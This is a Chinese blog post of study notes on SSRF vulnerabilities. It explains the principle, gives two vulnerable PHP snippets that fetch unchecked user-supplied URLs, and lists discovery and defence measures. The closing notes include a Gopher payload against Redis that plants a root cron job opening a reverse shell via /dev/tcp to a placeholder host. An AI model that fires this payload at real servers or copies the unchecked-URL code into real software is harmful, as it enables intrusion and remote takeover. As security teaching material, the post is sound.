5、SSRF漏洞

已于 2024-01-07 22:32:59 修改
阅读量401 收藏 9
点赞数 12
分类专栏: Web漏洞(后端) 文章标签: 网络安全 安全 笔记 经验分享 其他
于 2024-01-07 22:24:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74152774/article/details/135437533
版权

1、概述

SSRF(Server-site request forgery)服务端请求伪造。

网站未合理的对用户传入的URL进行过滤和判别时就有可能会存在SSRF漏洞

  • 目标:内网

  • 分类:Web通用漏洞

  • 风险等级及危害:高危~严重

    利用SSRF攻击内网服务器(获取Webshell),或者利用SSRF漏洞获取大量敏感数据。

Tips:

为了运维方便,内网通常比外网脆弱,所以SSRF漏洞的危害比较大。

2、漏洞原理

攻击者传入URL,外网服务器接受并转发给内网服务器。

可探测内网ip、域名、服务器端口等。

支持HTTP、HTTPS、FTP、FTPS、TFTP、SFTP、Gopher、SCP、Telnet、DICT、FILE、LDAP、LDAPS、IMAP、POP3、SMTP、RTSP等协议。

下面是一些存在SSRF漏洞的源码:

<?php
$url = $_GET['url']; // 从用户获取URL参数

function get_page_title($url) {
    $content = file_get_contents($url); // 获取URL的内容
    preg_match('/<title>(.*?)<\/title>/ims', $content, $matches); // 提取页面标题
    return isset($matches[1]) ? $matches[1] : 'No title found';
}

$title = get_page_title($url); // 获取页面标题
echo "页面标题是: " . $title;
?>
<?php
$url = $_GET['url']; // 从用户获取URL参数

function get_page_title($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $response = curl_exec($ch);
    curl_close($ch);
    
    preg_match('/<title>(.*?)<\/title>/ims', $response, $matches); // 提取页面标题
    return isset($matches[1]) ? $matches[1] : 'No title found';
}

$title = get_page_title($url); // 获取页面标题
echo "页面标题是: " . $title;
?>

3、漏洞挖掘

对于无回显的漏洞可以用盲打技术来挖掘。

挖掘SSRF时可以使用http://127.0.0.1、http://aaa.com、http://aaa.a(不存在的域名),观察其返回是否一致来判断是否允许请求外网。

对SSRF的利用,一般会先探测内网开放端口,然后利用Gopher协议直接发payload攻击像Redis未授权访问、Struts2远程命令执行等存在漏洞的服务器。

  1. 访问内部系统资源: 攻击者可能访问服务器内部的敏感文件、数据库或配置信息。
  2. 绕过防火墙和访问控制: 通过向内部网络发送请求,攻击者可以绕过防火墙或内部访问控制。
  3. 攻击外部系统: 利用服务器的信任关系向外部系统发起攻击,如DDoS攻击或利用其他应用程序的漏洞等。

4、漏洞防御

  1. 输入验证和过滤: 对用户输入的URL参数或远程请求进行严格的验证和过滤,仅允许必要的URL。
  2. 白名单限制: 限制服务器可以访问的远程资源范围,建立白名单并严格控制访问权限。
  3. 使用内部代理访问: 如果需要访问内部资源,可使用内部代理或专用通道,而不是直接从服务器端发起请求。
  4. 最小权限原则: 给予应用程序最小的权限以减少潜在的危害。
  5. 安全配置: 确保服务器和应用程序的安全配置,尽可能减少服务器对外部资源的信任。

5、注释

Gopher是什么 :他是Internet上的一个信息查找系统,应用在WWW出现之前,使用TCP70端口。在SSRF场景常使用Gopher协议发送Socket数据

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0
d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >&
/dev/tcp/ip/port>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0
d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0
a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%
0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a

 

DarkByte-
关注
  • 12
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞定级标准参考
空鵼
01-28 8552
SRC漏洞定级标准 分资产,核心资产,一般资产,边缘资产 严重漏洞: 1.不需要登录直接获取设备root权限的漏洞,包括但不限于上传Webshell,任意代码执行,远程命令执行等 2.不需要登录直接导致严重的信息泄露漏洞,包括但不限于重要数据库的SQL注入、系统权限控制不严格等导致的敏感数据泄露漏洞等 3.不需要登录直接导致严重影响的逻辑漏洞,包括但不限于核心账户体系的帐密校验逻辑、支付逻辑漏洞等 高危漏洞: 1.需要登录的重要业务铭感数据信息泄露漏洞,包括但不限于重要用户信息、配置信息、数据
安全漏洞的分类、描述与解决方案
花米徐xl_lx的专栏
07-24 1万+
安全测试,安全漏洞
SSRF漏洞的利用与攻击内网应用
qwzf
03-24 2747
0x02 SSRF漏洞 1、SSRF漏洞简介 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(由于它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内网) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目...
48. SSRF篇——SSRF原理+利用+防御
Fly_鹏程万里
03-20 7032
SSRF概述SSRF(Server-SideRequest Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL...
SSRF漏洞实战
yuan_boss的博客
09-04 1346
服务器会根据用户提交的URL 发送一个HTTP 请求。使用用户指定的URL,Web 应用可以获取图片或者文件资源等。典型的例子是百度识图功能。如果没有对用户提交URL 和远端服务器所返回的信息做合适的验证或过滤,就有可能存在“请求伪造”的缺陷。“请求伪造”,顾名思义,攻击者伪造正常的请求,以达到攻击的目的。如果“请求伪造”发生在服务器端,那这个漏洞就叫做“服务器端请求伪造”,英文名字Server Side Request Forgery,简称SSRF。
SSRF漏洞详解
热门推荐
qq_48904485的博客
03-22 1万+
一、SSRF概述 SSRF全称为Server-side Request Fogery,中文含义为服务器端请求伪造,漏洞产生的原因是服务端提供了能够从其他服务器应用获取数据的功能,比如从指定的URL地址获取网页内容,加载指定地址的图片、数据、下载等等。 一般情况下,我们服务端请求的目标都是与该请求服务器处于同一内网的资源服务,但是如果没有对这个请求的目标地址、文件等做充足的过滤和限制,攻击者可通过篡改这个请求的目标地址来进行伪造请求,所以这个漏洞名字也叫作“服务器请求伪造”。 利用SSRF能实现以下效果: 1
SSRF 漏洞笔记
qq_32812063的博客
11-25 1086
SSRF
SSRF漏洞
qq_50673174的博客
05-19 1226
SSRF漏洞基本原理
ssrf漏洞复现
m0_55631425的博客
03-27 2702
漏洞复现 cd /usr/local ls cd vulhub-master cd weblogic cd ssrf docker-compose up -d ifconfig查询下本机IP 访问http://192.168.106.139:7001/uddiexplorer/SearchPublicRegistries.jsp ,出现以下界面 这里可能会遇到访问不上的情况,发现物理机无法ping通虚拟机,虚拟机能ping通物理机 只需给VMnet8的虚拟网卡禁用再启用就行 历经千辛万苦终于进来了 1、
SSRF漏洞复现
m0_57485346的博客
03-15 1072
ssrf漏洞复现
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
104-web漏洞挖掘之SSRF漏洞1
08-03
1.禁用不需要的协议 2.统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态 3.禁止302跳转,或者每跳转一次,就检查一次新的Host是否是内网
31-浅谈SSRF漏洞1
08-03
1、获取web应用可达服务器服务的banner信息以及收集内网web应用的指纹识别, 2、攻击运行在内网的系统或应用程序,获取内网各系统弱口令进行内网漫游、对有
ssrf-lab:探索SSRF漏洞的实验室
05-22
实验室 探索SSRF漏洞的实验室 10月4日的实验室位于/ ctf目录中:-)
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8230
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
守护长者安全,平安养老险携手福海街道开展防灾减灾活动
最新发布
NewsMash的博客
05-15 134
展望未来,平安养老险深圳分公司将持续与更多养老社区携手开展系列活动,合计赠送1000份灭火袋,并推出更多关爱老年人的举措,以实际行动为构建安全、和谐的养老环境贡献力量,为老年人的金色晚年添上温暖色彩,让他们的生活更加安心、舒心。老人们在台下听的投入,并在互动环节踊跃提问。作为平安集团服务养老、保障民生的重要“窗口”,平安养老险始终坚持金融工作的政治性、人民性,以满足人民日益增长的美好生活需要作为高质量发展的出发点和落脚点,公司期待与更多关心老年人福祉的人士携手,共筑“老有所养、老有所依”的中国梦。
网站有存在哪些类型的漏洞,网站漏洞存在哪些危害,该怎么解决网站漏洞问题
dexunyun的博客
05-14 364
通过使用漏洞扫描VSS服务,我们可以及时发现网站存在的漏洞,有效降低网站漏洞风险,保障网站安全,满足合规要求。文件上传漏洞是由于网站在处理文件上传功能时没有对上传的文件类型、大小等进行严格的验证和过滤,攻击者利用网站中的文件包含函数,将恶意文件或代码包含到网站中,从而实现远程代码执行或文件读取。网站安全是一个持续的过程,需要我们不断关注,通过及时发现存在的漏洞,我们可以针对性的处理,这样可以有效地减少网站安全漏洞的产生和危害,确保网站的安全稳定运行。同时,采用安全的编程语言和框架,减少漏洞的产生。
高效且安全的传输工具:FileLink跨网文件传输
m0_69398711的博客
05-14 465
同时,它还提供了权限控制功能,例如:文件打开次数、访问时间、禁止截屏、禁止复制、禁止打印、显示水印,有效防止了数据泄露和非法访问。然而,FileLink利用先进的网络技术和协议优化,成功打破了这一局限。它提供广泛的集成支持,权限组件、审批组件均开放API,可与企业现有IT系统充分集成,深度支撑与贯通企业跨网业务流程,致力于打造更全面的数据安全平台。综上所述,FileLink跨网文件传输以其出色的跨网络性能、安全性、多功能性、易用性以及集成扩展能力,成为了现代办公和日常生活中不可或缺的文件传输工具。
ssrf漏洞内网渗透_ssrf漏洞分析
06-06
5. 利用漏洞:根据收集到的信息,选择合适的漏洞利用方式,从而取得系统权限。 在实际攻击中,攻击者还可能会采用其他方式来利用 SSRF 漏洞,如访问内部 Web 应用、获取敏感文件等。因此,网站开发人员需要注意防范...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值